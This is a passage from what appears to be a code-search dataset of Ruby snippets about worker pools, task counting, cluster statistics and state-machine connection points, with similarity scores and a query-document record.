"def stats\n stats = {\n :servers => {}, \n :results => 0, \n :taken_tasks => 0, \n :untaken_tasks => 0,\n :taken_master_tasks => 0,\n :taken_task_tasks => 0, \n :untaken_master_tasks => 0,\n :untaken_task_tasks => 0,\n :failed_tasks => 0,\n :untaken_future_tasks => 0,\n :time => Time.now.to_f,\n }\n\n stats[:untaken_future_tasks] = SkynetWorkerQueue.connection.select_value(%{\n SELECT count(id)\n FROM #{message_queue_table}\n WHERE expire_time > #{Time.now.to_i} and tasktype = 'task' and payload_type = 'master' \n })\n\n stat_rows = SkynetWorkerQueue.connection.select_all(%{\n SELECT tasktype, payload_type, iteration, count(id) as number_of_tasks, expire_time\n FROM #{message_queue_table} \n WHERE expire_time <= #{Time.now.to_i} \n GROUP BY tasktype, payload_type, iteration \n }) \n stat_rows.each do |row|\n if row[\"tasktype\"] == \"result\" or row[\"payload_type\"] == \"result\"\n stats[:results] += row[\"number_of_tasks\"].to_i\n elsif row[\"tasktype\"] == \"task\" \n type_of_tasks = nil\n if row[\"payload_type\"] == \"master\"\n type_of_tasks = :master_tasks\n elsif row[\"payload_type\"] == \"task\"\n type_of_tasks = :task_tasks\n end\n if row[\"iteration\"].to_i == 0\n stats[\"untaken_#{type_of_tasks}\".to_sym] += row[\"number_of_tasks\"].to_i \n stats[:untaken_tasks] += row[\"number_of_tasks\"].to_i\n elsif row[\"expire_time\"].to_i < Time.now.to_i\n stats[:failed_tasks] += row[\"number_of_tasks\"].to_i \n else\n stats[\"taken_#{type_of_tasks}\".to_sym] += row[\"number_of_tasks\"].to_i \n stats[:taken_tasks] += row[\"number_of_tasks\"].to_i\n end\n end\n end\n\n stats[:time] = Time.now.to_f - stats[:time]\n stats\n end",
"def waiting_threads_count\n @waiting_threads_sleepers.length\n end",
"def start(num_requested=1, workitem_id=nil, user_data=nil)\n \n # find instances with that image id\n logger.info \"Considering request to start #{num_requested} #{role.name} instances \"\n\n total_running = (instances.select{ |i| i.running? }).size\n \n node_array = instances.select{ |i| i.available? }\n\n num_to_start = 0\n \n if total_running >= max\n logger.info \"Instance limit for #{num_requested} reached. Will not start any more instances.\"\n #lets reserve all nodes so they don't get shutdown in the meantime.\n node_array.each do |node|\n node.state = 'reserved'\n node.save\n end\n WorkitemHelper.send_reply(workitem_id) unless workitem_id.nil?\n \n else\n logger.info \"Reserving for: #{num_requested} #{role.name} instances \"\n # reserve those nodes that are running, and then start / create the balance\n node_array.each do |node|\n break if num_requested < 1\n node.state = 'reserved'\n node.save\n num_requested = num_requested.to_i - 1\n \n end\n\n #now lets start the rest of the nodes needed, assuming we don't go past the max limit!\n #first lets get a count of how many nodes are LAUNCHED, IDLE, BUSY, or RESERVED\n total_left = max - total_running\n num_to_start = total_left < num_requested.to_i ? total_left : num_requested.to_i\n\n \n #start num_to_start instances via Instance. Enqueue these in delayed job because they may take a while\n start_and_create_instances(num_to_start, user_data) unless num_to_start < 1\n \n #now also enqueue the workitem reply if needed\n WorkItemHelper.send_reply(workitem_id) unless workitem_id.nil?\n \n logger.info \"Starting #{num_to_start} more #{ami_id} instances. Note that this may take a moment. \"\n EventLog.info \"Starting #{num_to_start} more #{ami_id} instances. Note that this may take a moment. \"\n \n end\n \n return num_to_start\n \n \n end",
"def increment_listened_times\n increment(:listened_times)\n end",
"def calibrate_workers \n if !(stopped?)\n # Handle received signals\n @sig_queue.each { |signal| @sig_handlers[signal].call }\n @sig_queue = []\n # Check all channels for dead ones\n @workers.each_pair { |pid, worker|\n worker[:inactive] += 1\n if worker[:inactive] > @options[:timeout]\n running = ( Process.getpgid(pid) rescue false )\n if running \n if worker[:status] == :ALIVE \n @logger.log(Logger::Severity::WARN,\n \"Worker #{worker[:name]} with PID #{pid} timed out .. Terminating the worker process gracefully\", @options[:name])\n kill_worker(:TERM, pid)\n worker[:status] = :TERMINATING\n elsif worker[:status] == :TERMINATING && worker[:inactive] > @options[:timeout] + 60\n @logger.log(Logger::Severity::WARN, \n \"Timedout Worker #{worker[:name]} with PID #{pid} did not terminate gracefully .. Killing the worker process\", @options[:name])\n kill_worker(:KILL, pid)\n worker[:status] = :KILLED\n end\n end\n end\n }\n reap_workers\n if !(stopped?)\n # Fork new_workers if needed\n while @workers.length < @options[:workers]\n @logger.log(Logger::Severity::WARN, \"Missing workers .. Current workers: #{@workers.length} .. Forking new ones \", @options[:name])\n new_worker\n end\n end\n end\n end",
"def tasks_pending_count\n inject(0) do |sum, node|\n sum + node.graph.tasks_pending_count\n end\n end",
"def tasks_pending_count\n inject(0) do |sum, node|\n sum + node.graph.tasks_pending_count\n end\n end",
"def before_starting_workers\n end",
"def reap_workers\n # Don't try to find more dead workers than the process count\n @workers.length.times do\n # We use +waitpid+ to find any child process which has exited. It\n # immediately returns when there aren't any dead processes.\n if pid = Process.waitpid(-1, Process::WNOHANG)\n despawn_worker(pid)\n else\n return # Stop when we don't find any\n end\n end\n end",
"def workers=(n)\n if n != @workers || !known?\n p \"Scaling #{type} to #{n}\"\n heroku_set_workers(n)\n know n\n end\n end",
"def terminate_timeout\n workers.map(&:stop_timeout).compact.max.to_i + 10\n end",
"def processor_count; end",
"def processor_count; end",
"def workload\n [@nodeid,@data.count]\n end",
"def nodes_percent\n (nodes_used.to_f / nodes_avail.to_f) * 100\n end",
"def tasks_failed_count\n inject(0) do |sum, node|\n sum + node.graph.tasks_failed_count\n end\n end",
"def tasks_failed_count\n inject(0) do |sum, node|\n sum + node.graph.tasks_failed_count\n end\n end",
"def count_observers\n sync_peers { |peers| peers.size }\n end",
"def reap_dead_workers(reason='unknown')\n if workers.list.length > 0\n DTR.info \"Reaping #{workers.list.length} threads because of '#{reason}'\"\n error_msg = \"#{Time.now}: WorkerClub timed out this thread: #{reason}\"\n mark = Time.now\n workers.list.each do |worker|\n worker[:started_on] = Time.now if not worker[:started_on]\n\n if mark - worker[:started_on] > timeout\n DTR.info \"Thread #{worker.inspect} is too old, killing.\"\n worker.raise(TimeoutError.new(error_msg))\n end\n end\n end\n\n return workers.list.length\n end",
"def count_used_instances\n count = 0\n return count\n end",
"def workers\n result = {}\n\n @servers.each do |server|\n\n\n sock=socket server\n if sock.nil?\n result[server] = \"unable to connect to server\" if sock.nil?\n\n else\n result[server] = {}\n result[server][:workers] = []\n if response = send_command(sock, 'workers')\n response.split(\"\\n\").each do |line|\n workers = parse_worker_line line unless line == '.'\n result[server][:workers] << workers\n end\n else\n result[server][:workers] = \"No response from server\"\n\n end #response\n end #if\n end #servers\n result\n end",
"def send_node_stats(node_ip)\n metrics_queue = Librato::Metrics::Queue.new\n\n cadvisor_res = Typhoeus.get(\"http://#{node_ip}:4194/api/v1.3/docker/\")\n data = Oj.load(cadvisor_res.body)\n\n data.values.each do |container|\n # Skip containers that aren't managed by kube:\n next if container['spec']['labels'].nil?\n\n # Parse the container name out of the container name auto-generated by kube\n # see https://github.com/kubernetes/heapster/blob/78ff89c01f52c0ab49dac2d356a8371e79482544/sources/datasource/kubelet.go#L156 \n container_name = container['aliases'].first.split('.').first.sub('k8s_','')\n\n # Join all of this together into a librato source name:\n source_name = ENV['CONTEXT'] + '.' + container['spec']['labels']['io.kubernetes.pod.name'].sub('/', '.') + '.' + container_name\n\n puts source_name\n\n stats = container['stats'].last\n\n # k8s_POD form the virtual network for a pod. We must collect net stats from this container,\n # since net counters for indvidual pod containers are always 0. See http://stackoverflow.com/questions/33472741/what-work-does-the-process-in-container-gcr-io-google-containers-pause0-8-0-d\n # for more info. No need to collect memory and cpu stats for this container.\n if container_name == 'POD'\n metrics_queue.add \"kube.network.tx_bytes\" => { type: :counter, value: stats['network']['tx_bytes'], source: source_name }\n metrics_queue.add \"kube.network.rx_bytes\" => { type: :counter, value: stats['network']['rx_bytes'], source: source_name }\n next\n end\n\n if stats['cpu']\n cpu_ms = stats['cpu']['usage']['total'] / 1000000\n metrics_queue.add \"kube.cpu.usage_ms\" => { type: :counter, value: cpu_ms, source: source_name }\n end\n \n if stats['memory']\n metrics_queue.add \"kube.memory.usage\" => { value: stats['memory']['usage'], source: source_name }\n metrics_queue.add \"kube.memory.rss\" => { value: stats['memory']['working_set'], source: source_name }\n end\n end\n\n metrics_queue.submit\nend",
"def num_waiting\n @num_waiting\n end",
"def workers\n @worker_supervisor.actors\n end",
"def initialize\n @queue = Queue.new\n @workers = []\n @workers_count = 5\n end",
"def work_pool; end",
"def serverWorker_pods\nend",
"def handle_addrs count = 32\n @node.addrs.weighted_sample(count.to_i) do |addr|\n Time.now.tv_sec + 7200 - addr.time\n end.map do |addr|\n [addr.ip, addr.port, Time.now.tv_sec - addr.time] rescue nil\n end.compact\n end",
"def init_workers(servers)\n @w = []\n servers.each{|s|\n @w << Worker.new(s)\n }\n end",
"def worker_pool_size=(_arg0); end",
"def prune\n @lock.synchronize do\n @workers.delete_if { |w| !w.alive? }\n @size = @workers.size\n end\n end",
"def num_waiting\n synchronize do\n @num_waiting\n end\n end",
"def num_waiting\n synchronize do\n @num_waiting\n end\n end",
"def get_node_ready(nodes)\n ready_nodes = nodes.select { |node| check_node_status(node) == \"ready\" }\n idle_nodes = []\n ready_nodes.each { |node| idle_nodes << node if !(DRbObject.new(nil, \"druby://#{node.ip}:9000\").executando_job) }\n idle_nodes.min{|a,b| DRbObject.new(nil, \"druby://#{a.ip}:9000\").cpu <=> DRbObject.new(nil, \"druby://#{b.ip}:9000\").cpu }\n end",
"def count_thread(id, conn)\n Thread.current['id'] = \"INFO\"\n n = 60\n loop do\n last = conn[id.to_s].count\n sleep(n)\n tputs \"Gained #{conn[id.to_s].count - last} ids in the last #{n} seconds\"\n end\nend",
"def workers\n ::Resque.info[:workers].to_i\n end",
"def slave_count\n workers.size - 1\n end",
"def quantity\n @task_worker_lock.synchronize {@task_workers.size}\n end",
"def throttles; end",
"def reap_dead_workers(reason='unknown')\n if @workers.list.length > 0\n logger.error \"#{Time.now}: Reaping #{@workers.list.length} threads for slow workers because of '#{reason}'\"\n error_msg = \"Leech timed out this thread: #{reason}\"\n mark = Time.now\n @workers.list.each do |worker|\n worker[:started_on] = Time.now if not worker[:started_on]\n if mark - worker[:started_on] > @timeout + @throttle\n logger.error \"Thread #{worker.inspect} is too old, killing.\"\n worker.raise(TimeoutError.new(error_msg))\n end\n end\n end\n return @workers.list.length\n end",
"def list_workers\n Shuttle::Redis.smembers worker_set_key\n end",
"def schedules\n workers.map(&:schedule)\n end",
"def desired_workers(total, new, processed, current_workers)\n\n worker_speed = calc_worker_speed(processed, current_workers)\n\n # elimino o ciclo passado de todos os worksets já existentes\n @worksets.each do |workset|\n if workset.empty?\n @worksets.delete(workset)\n else\n workset.shift\n end\n end\n\n # Novo workset para os novos jobs, levando em conta eventuais deficits\n # devido diferença entre o esperado e o realmente processasdo\n expected = current_workers * worker_speed * @cycle_duration_in_minutes\n deficit = [expected - processed,0].max\n @worksets << new_work_set(new + deficit, worker_speed)\n\n # calculo o final levando em conta todos os worksets\n workers_count = calc_final_desired_workers\n # mas se tiver um job, tenho um worker\n if workers_count == 0 && total > 0\n workers_count = 1\n end\n workers_count\n end",
"def workload_network_count(network, server)\n workload_count = 1\n server.nic_teams .each do |teams|\n teams[:networks].each do |net|\n if net.vlanId == network.vlanId\n workload_count = teams[:mac_addresses].count\n break\n end\n end\n end\n workload_count\n end",
"def worker_boot_timeout(timeout); end",
"def masterrun\n self.workersrun \n self.serverrun \n end",
"def pool \n @pool.select(&:alive?).size\n end",
"def get_registered_workers\n @registered_workers\n end",
"def tasks_total_count\n inject(0) do |sum, node|\n sum + node.graph.tasks_total_count\n end\n end",
"def tasks_total_count\n inject(0) do |sum, node|\n sum + node.graph.tasks_total_count\n end\n end",
"def fork_count\n ENV['OPAL_PREFORK_THREADS']&.to_i || (Etc.nprocessors * 3 / 4.0).ceil\n end",
"def create_workers\n @workers.times do |id|\n pid = fork { Worker.new(@options.merge(id: id)).start }\n @forks << { id: id, pid: pid }\n end\n end",
"def kill_workers\n pids = %x{ps --ppid #{pid}}.split(/\\n+/).map {|line| line.sub(%r{^\\s*(\\d+)\\s+.*}, '\\\\1').to_i}\n pids.shift\n pids.each {|id| Process.kill('KILL', id) rescue nil}\n end",
"def done_working\n job, start = @balancer_start\n usage = (Time.now.to_f - start.to_f) / balancer_weights[job.queue]\n balancer_usage[job.queue] += usage\n super\n end"
] |
[
"0.7240735",
"0.6631506",
"0.6394284",
"0.6354455",
"0.6354455",
"0.629941",
"0.61719173",
"0.61647886",
"0.6072421",
"0.6066781",
"0.604655",
"0.59918296",
"0.59715456",
"0.594274",
"0.5942223",
"0.59413034",
"0.5925082",
"0.58989596",
"0.58748287",
"0.5855831",
"0.5835867",
"0.5834338",
"0.5832292",
"0.58051157",
"0.58051157",
"0.5777303",
"0.5728359",
"0.5725588",
"0.57230574",
"0.57230574",
"0.5700251",
"0.56866384",
"0.56866384",
"0.5679613",
"0.5667553",
"0.56555337",
"0.56426",
"0.56018585",
"0.55946743",
"0.55846566",
"0.5584297",
"0.55647415",
"0.5560326",
"0.55543244",
"0.5544013",
"0.5539547",
"0.5530189",
"0.5526012",
"0.5507458",
"0.54984975",
"0.549603",
"0.5487031",
"0.5487031",
"0.547066",
"0.5468187",
"0.54673725",
"0.5449477",
"0.5445433",
"0.5445433",
"0.5444783",
"0.5438925",
"0.54344314",
"0.54344314",
"0.5393209",
"0.53854674",
"0.53807974",
"0.5378171",
"0.5366979",
"0.53616375",
"0.5352702",
"0.53487384",
"0.5346325",
"0.53441644",
"0.53430414",
"0.5343002",
"0.53347135",
"0.53339916",
"0.5331969",
"0.5331969",
"0.53263015",
"0.531774",
"0.53156924",
"0.53096056",
"0.5305182",
"0.53040504",
"0.5303777",
"0.5293655",
"0.52918714",
"0.52901775",
"0.5280257",
"0.52801424",
"0.5280101",
"0.52673054",
"0.52662843",
"0.52586854",
"0.52586854",
"0.52572715",
"0.52519417",
"0.5235452",
"0.5235265"
] |
0.72736335
|
0
|
Adds a Pseudostate to this State.
|
def add_connectionPoint! s
_log { "add_connectionPoint! #{s.inspect}" }
if @connectionPoint.find { | x | x.name == s.name }
raise ArgumentError, "connectionPoint named #{s.name.inspect} already exists"
end
@connectionPoint << s
s.state = self
# Notify.
s.connectionPoint_added! self
s
end
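A hedged usage sketch for add_connectionPoint!. The State and Pseudostate constructors shown here are assumptions for illustration, not part of the source:

state = State.new                      # assumed no-arg constructor
entry = Pseudostate.new(:entry)        # assumed name-taking constructor
state.add_connectionPoint!(entry)      # returns entry; entry.state is now state
begin
  state.add_connectionPoint!(Pseudostate.new(:entry))
rescue ArgumentError => e
  warn e.message                       # duplicate connection point names are rejected
end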
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def add_state(state)\n inferred_state = infer_state(state)\n self.states.upush! inferred_state if inferred_state\n end",
"def addstate ( ps )\n raise TypeError, ps.class.to_s + ': Incorrectly types for \\'<<\\' method of <Parser>.' unless\n\tps.instance_of? State\n\n @states << ps\n end",
"def add_state(s)\n @states << s\n self\n end",
"def << (triple)\n # self.add_triple(s, p, o)\n @triples += [ triple ]\n end",
"def add_state_attr(attr)\n new_attrs = (self.class.state_attrs << attr).uniq\n self.class.state_attrs(*new_attrs)\n end",
"def add_state(new_state)\n valid = true\n @states.each do |state|\n raise Fae::DuplicateStateException, 'Duplicate state added for Finite Automata' if new_state.name == state.name\n end\n @states << new_state\n end",
"def add_state(state, value = false)\n @states[state] = [\n factory.composite_state(self.class.name, state),\n value\n ]\n\n classify_state @states[state]\n end",
"def add(p)\nq = self.dup\nq.add!(p)\nend",
"def +(p)\n Pair.new(@x + p.x, @y + p.y)\n end",
"def add_neuron(n)\n neurons << n\n end",
"def add(name, state)\n\tif(@states[name] != nil)\n\t raise StateMachine::Error, \"state '#{name}' exists\"\n\tend\n\t@states[name] = state\n\treturn self\n end",
"def new_state\n newID = @@nextID\n @@nextID += 1\n @state[newID] = true\n @transition[newID] = {}\n newID \n end",
"def new_state\n newID = @@nextID\n @@nextID += 1\n @state[newID] = true\n @transition[newID] = {}\n newID \n end",
"def new_state\n newID = @@nextID\n @@nextID += 1\n @state[newID] = true\n @transition[newID] = {}\n newID \n end",
"def dup_adding_state(line)\n self.class.new(queue, codec, path).add_state(line)\n end",
"def set_PADD(value)\n set_input(\"PADD\", value)\n end",
"def add(p0) end",
"def +(value)\n duplicate = self.dup \n duplicate << value\n duplicate\n end",
"def +(p)\n group(self, p)\n .fmap {|(x, y)| x + y }\n .tap {|r| r.label = \"(#{label} + #{p.label})\" }\n end",
"def <<( n )\n n.add_label!( self )\n end",
"def +(delta)\n clone.increment(Meangirls.node, delta)\n end",
"def save_state(state)\n states.add(state)\n end",
"def add(time)\n newDuration = self.dup() ;\n return self.inc(time) ;\n end",
"def yadd( off )\n @y.add( off )\n self\n end",
"def add(pointer, pmodes)\n args = get_parameters(pointer, pmodes)\n @ram[args[2]] = args[0] + args[1]\n pointer + 4\n end",
"def dup_state\r\n @state.dup\r\n end",
"def add point\n self.x += point.x\n self.y += point.y\n self\n end",
"def new_state\nnewID = @@nextID\n@@nextID += 1\n@state[newID] = true\n@transition[newID] = {}\nnewID\nend",
"def add_to_point point\n add_to_point! point.dup\n end",
"def add(o)\n @hash[o] = true\n self\n end",
"def +(other)\n self.clone.set(@addr + other, @family)\n end",
"def + (point)\n self.class.new(x + point.x, y + point.y)\n end",
"def add (input)\n @g_inputs << input\n end",
"def +(other)\n transitions = @transitions.merge(other.transitions)\n # Add a new empty transition from the final states in the current\n # automaton to the inital state in the adjoined automaton.\n @final_states.each do |s|\n if transitions[s]\n transitions[s].merge!({nil => other.initial_state })\n else\n transitions[s] = {nil => other.initial_state }\n end\n end\n\n # Should check automaton type here instead of defaulting to NDFSA\n NDFSA.new(transitions, @initial_state, other.final_states, @cats)\n end",
"def <<(p)\n raise TypeError, \"Esperada pregunta para inserción\" unless p.is_a? (Pregunta)\n if (@total == 0)\n @cabeza = Nodo.new(p, nil, nil)\n @cola = @cabeza\n else\n @cola.next = Nodo.new(p, nil, @cola)\n @cola = @cola.next\n @cola.value\n end\n @total += 1\n end",
"def +(*others)\n self.dup.add!(*others)\n end",
"def add!(p)\n@x += p.x\n@y += p.y\nself\nend",
"def add_synonym(synonym)\n synonyms << synonym\n end",
"def add_states(new_states); end",
"def add_agg_pubkey(activate_height, agg_pubkey)\n payload = activate_height.to_even_length_hex + agg_pubkey\n index = latest_agg_pubkey_index\n next_index = (index.nil? ? 0 : index + 1).to_even_length_hex\n db.batch do\n db.put(KEY_PREFIX[:agg_pubkey] + next_index, payload)\n db.put(KEY_PREFIX[:latest_agg_pubkey], next_index)\n end\n end",
"def add num = 1\n @ec.add reg, size * num\n end",
"def test_add_state\n Automaton.new(false) do |fa|\n s0 = fa.add_state\n assert_equal(1, fa.state_count)\n assert_equal(false, s0.initial?)\n assert_equal(false, s0.accepting?)\n\n s1 = fa.add_state(:initial => true)\n assert_equal(2, fa.state_count)\n assert_equal(true, s1.initial?)\n assert_equal(false, s1.accepting?)\n\n s2 = fa.add_state(:initial => true, :accepting => true)\n assert_equal(3, fa.state_count)\n assert_equal(true, s2.initial?)\n assert_equal(true, s2.accepting?)\n\n s3 = fa.add_state(:myownkey => \"blambeau\")\n assert_equal(4, fa.state_count)\n assert_equal(false, s3.initial?)\n assert_equal(false, s3.accepting?)\n assert_equal(\"blambeau\", s3[:myownkey])\n\n assert_equal(0, fa.edge_count)\n end\n end",
"def +(ts)\n self.clone.add_points ts\n end",
"def add\n match '+'\n term\n emit_ln 'ADD (SP)+, D1'\nend",
"def add(other)\r\n Bottle.new(@label, @ounces+other.ounces)\r\n end",
"def add(other)\r\n Bottle.new(@label, @ounces+other.ounces)\r\n end",
"def add_state(state)\n if not @states.include? state\n # Prevents arbitrarily overriding methods that you shouldn't be\n raise \"Method already taken #{state}?\" if @class.methods.include?(:\"#{state}?\")\n @states[state] = State.new(state)\n @class.send(:define_method, :\"#{state}?\"){current_state == state}\n end\n end",
"def add(other)\n clone.add! other\n end",
"def add(d, s, t)\n reg_w(d, reg_r(s) + reg_r(t))\n adv_pc\n end",
"def add_property(x)\n x = Property.create(x)\n safe_add_edge(x, x.opposite, :provable_false)\n safe_add_edge(x.opposite, x, :provable_false)\n safe_add_edge(x, x, :provable_true)\n safe_add_edge(x.opposite, x.opposite, :provable_true)\n x\n end",
"def add(opt)\n ipaddr_modify(RTM_NEWADDR, NLM_F_CREATE|NLM_F_EXCL, opt)\n end",
"def + point\n\t\tPoint.new(@x+point.x, @y+point.y)\n\tend",
"def add!(point)\r\n @x += point.x\r\n @y += point.y\r\n end",
"def add_feature(feature, state)\n check_feature_is_not_symbol(feature)\n check_feature_already_in_list(feature)\n Redis.current.hset(@redis_key, feature, state)\n end",
"def add_neuron(neuron)\r\n\t\t@neurons.push(neuron)\r\n\tend",
"def add(coordinate)\n new_x = @x + coordinate.x\n new_y = @y + coordinate.y\n new_coordinate = Coordinate.new(new_x,new_y)\n end",
"def add (geneBits)\n @genePool[@size] = Gene.new(@geneLen)\n @genePool[@size].duplicate(geneBits)\n @genePool[@size].fitness = geneBits.fitness\n @size += 1\n end",
"def add(value)\n \n end",
"def add word\n super word.clone\n end",
"def add(value)\n @add_at_next = 0 unless @add_at_next\n add_at @add_at_next, value\n end",
"def add_state(v)\nunless has_state?(v)\n@state[v] = true\n@transition[v] = {}\nend\nend",
"def +(val)\n Thread.current[:datet_addmode] = \"+\"\n self.add_something(val)\n end",
"def add_single toadd\n case toadd\n when Dist\n dist << @len.Dist\n dist.last_born << toadd\n else\n return false\n end\n true\n end",
"def add_shape(properties = {})\n shape = Shape.new(properties)\n shape.palette = @palette\n\n @shapes ||= []\n @shapes << shape # Store shape reference.\n shape\n end",
"def << (sup)\r\n new_network_id = self.get_network_id\r\n set_network_id = lambda do |s|\r\n raise(PlanB::InvalidClass, \"supported must be descendant of AlnTermination\") unless s.class.class_hierarchy.include?(AlnTermination)\r\n s.network_id = new_network_id\r\n s.layer_id = self.layer_id + 1\r\n s.termination_supporter = self\r\n s.save\r\n end\r\n sup.class.eql?(Array) ? sup.each{|s| set_network_id[s]} : set_network_id[sup]\r\n self.aln_resource << sup\r\n end",
"def add(el)\n # System.out.println(\"add(\"+el+\")\");\n n = word_number(el)\n # System.out.println(\"word number is \"+n);\n # System.out.println(\"bits.length \"+bits.length);\n if (n >= @bits.attr_length)\n grow_to_include(el)\n end\n @bits[n] |= bit_mask(el)\n end",
"def add_hex(hex)\n @hexes.push(hex)\n end",
"def +(seconds)\n TzTime.new(time + seconds, @zone)\n end",
"def add_gold(gold)\n @goldcounter += gold\n @goldcounter\n end",
"def +(other_point)\n Point.new(self.x + other_point.x, self.y + other_point.y)\n end",
"def add(point)\r\n new_point = Marshal.load(Marshal.dump(self))\r\n new_point.x = @x + point.x\r\n new_point.y = @y + point.y\r\n return new_point\r\n end",
"def +( other )\n dup << other\n end",
"def << (n)\n raise ArgumentError unless n.is_a?(Nota)\n self.old_append n \n end",
"def add_noise(data)\n noise(data, :+)\n end",
"def plus(signal)\n self.class.new(self, signal) { |a, b| a + b}\n end",
"def +(other)\n return dup.add(other)\n end",
"def add_node(n)\n @nodes.push n unless @nodes.include? n\n end",
"def add (p)\n @people << p \n end",
"def +(other)\n unioned = Automaton.new\n fa.dup(unioned)\n other.to_fa.dup(unioned)\n RegLang.new(unioned)\n end",
"def <<(input_token)\n @current_states = next_states(@current_states, input_token)\n end",
"def add_state(node, user, params)\n # => Create a Node-State Object\n (n = {}) && (n[:name] = node)\n n[:created] = DateTime.now\n n[:creator] = user\n n[:type] = params['type'] if params['type']\n # => Build the Updated State\n update_state(n)\n # => Return the Added Node\n find_state(node)\n end",
"def add!(rhs)\n @x += rhs.x\n @y += rhs.y\n self\n end",
"def Add(val)\n self.value += val\n end",
"def +(other)\n self.class.new(batch_state.to_h.merge(other.batch_state.to_h))\n end",
"def add_pin(_pin)\n raise \"pin named #{_pin.name} already added\" if @pins.include?(_pin.name)\n @pins[_pin.name] = _pin\n end",
"def add!(rhs)\n add rhs, self\n end",
"def add_fish (fish)\n @fish_population << fish\n\n end",
"def add_new_state_and_transition state_list, transitions, from_id, msg, destinations\n new_state_id = id_generator.next\n state_list << State.new(new_state_id, destinations )\n self.transitions << Transition.new(from_id, new_state_id, msg)\n end",
"def add_process!(redis, process_id)\n redis.multi do |conn|\n conn.zadd(key, Time.now.to_i, process_id)\n conn.expire(key, @timeout)\n end\n end",
"def +(p0) end",
"def +(p0) end",
"def +(p0) end",
"def +(p0) end",
"def +(other)\n `return self + other;`\n end",
"def +(other)\n `return self + other;`\n end",
"def add_address(address)\n @addresses << address\n end",
"def add(name, value = nil)\n symbols << [name.to_s, (Integer(value) if value)]\n end",
"def add(p, set_first = false)\n angle = self.angle(p)\n prior_idx = @neighbors.bsearch_index { |n| self.angle(n) >= angle }\n\n raise \"Point #{p.inspect} is already a neighbor of #{self.inspect}\" if prior_idx && @neighbors[prior_idx] == p\n\n @neighbors.insert(prior_idx || @neighbors.length, p)\n\n @first = p if @first.nil? || set_first\n end",
"def add_new\n self.times_used.unshift(0)\n self.save\n end",
"def add_round_key(state, round_key)\n state = Matrix.build(Nb, Nk) do |row, col|\n state[row, col] ^ round_key[row, col]\n end\n print_state(state, __method__) if DEBUG\n state\n end",
"def add(type)\n @value << type\n @value = @value.uniq\n end"
] |
[
"0.55765295",
"0.54607874",
"0.5139848",
"0.5138874",
"0.504211",
"0.50295275",
"0.49795917",
"0.49791703",
"0.49349418",
"0.4918888",
"0.48471597",
"0.47565934",
"0.47565934",
"0.47565934",
"0.47557563",
"0.47550985",
"0.47549525",
"0.47235757",
"0.47175694",
"0.47154087",
"0.47069126",
"0.46915808",
"0.46711937",
"0.46645337",
"0.46600065",
"0.46524134",
"0.4652322",
"0.4638726",
"0.45977417",
"0.4597115",
"0.45768738",
"0.4569087",
"0.45355994",
"0.45354936",
"0.45223352",
"0.4519889",
"0.45139337",
"0.45095053",
"0.44920325",
"0.44856012",
"0.44814417",
"0.4477048",
"0.44734687",
"0.44643426",
"0.44617188",
"0.44617188",
"0.44497025",
"0.44491652",
"0.44447985",
"0.4444712",
"0.44446218",
"0.44361895",
"0.44262728",
"0.4421441",
"0.44179112",
"0.4417401",
"0.4415284",
"0.43940037",
"0.43828607",
"0.4379975",
"0.43797952",
"0.437901",
"0.43698683",
"0.43677405",
"0.43673137",
"0.43587083",
"0.43549255",
"0.43529713",
"0.43436235",
"0.43419766",
"0.43327218",
"0.43290532",
"0.43289176",
"0.43212378",
"0.43171877",
"0.43168154",
"0.43058276",
"0.42980778",
"0.4298066",
"0.4296636",
"0.4295851",
"0.429449",
"0.4292067",
"0.42890567",
"0.4286773",
"0.4282695",
"0.4276861",
"0.42765817",
"0.42757794",
"0.42714468",
"0.42714468",
"0.42714468",
"0.42714468",
"0.42708293",
"0.42708293",
"0.42645708",
"0.42530864",
"0.42530677",
"0.4250406",
"0.42484385",
"0.42412305"
] |
0.0
|
-1
|
Removes a Pseudostate from this State.
|
def remove_connectionPoint! s
_log { "remove_connectionPoint! #{s.inspect}" }
@connectionPoint.delete(s)
s.state = nil
# Notify.
s.connectionPoint_removed! self
self
end
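And the matching teardown, under the same assumed constructors as the add_connectionPoint! sketch above. Since remove_connectionPoint! returns the state itself, removals are chainable:

exit_point = Pseudostate.new(:exit)    # hypothetical, as above
state.add_connectionPoint!(exit_point)
state.remove_connectionPoint!(entry).remove_connectionPoint!(exit_point) # clears each pseudostate's back-reference and fires connectionPoint_removed!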
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def delete_state(state)\n states.remove(state)\n end",
"def remove_state(state)\n self.from(state).each { |transition| remove(transition) }\n self.to(state).each { |transition| remove(transition) }\n self.states.delete(state)\n end",
"def remove_from_state state, ios\n return if ios.empty?\n\n state.send do |state|\n SelectorState.new(state.active - ios,\n state.inactive - ios,\n hash_without_keys(state.receivers, ios))\n end\n rescue => e\n log(Logger::ERROR, self.to_s + '#remove_from_state', e.to_s)\n end",
"def delete_state(state)\n @states.reject! { |_,v| v == state }\n#$stderr.print \"States: #{@states.length} \"\n end",
"def delete\n @reg.delete_bits(self)\n self\n end",
"def remove(p)\n @first = counterclockwise(@first) if @first.equal?(p)\n @first = nil if @first.equal?(p)\n @neighbors.delete(p)\n end",
"def erase_state(state_id)\n super\n check_state_remove_effects(state_id)\n end",
"def remove_shape\n\t\t@shapes.delete_at(0)\n\tend",
"def remove shape\n @remove_shapes << shape\n end",
"def clear_state\n @state.clear\n self\n end",
"def unstar\n set_starred_state(false)\n end",
"def remove(el)\n n = word_number(el)\n if (n >= @bits.attr_length)\n grow_to_include(el)\n end\n @bits[n] &= ~bit_mask(el)\n end",
"def destroy(state)\n hostname = state[:hostname]\n poolsclosed_delete(hostname)\n state.delete(:hostname)\n end",
"def clearState()\n\t\t\t@_previous_state = @_state\n\t\t\t@_state = nil\n\t\tend",
"def destroy\n @state.destroy\n end",
"def destroy\n @state.destroy\n end",
"def remove(value)\n connection.zrem(key_label, value)\n end",
"def remove_payment\n @payment = Payment.find(params[:id])\n @payment.update!(state: 2)\n end",
"def remove\n __flag__ :remove\n end",
"def pop_state\n @state.pop\n end",
"def delete_pid()\n if @pid.ours? then\n @pid.delete()\n end\n end",
"def remove_point(point)\n self.points.delete point\n point.cluster = nil\n end",
"def remove(x, y)\n @store[x, y] = 0\n end",
"def discard_property\n if(object.is_a?(SemanticProperty))\n SemanticProperty.delete(object.id)\n end\n end",
"def ~\n Not.new(self)\n end",
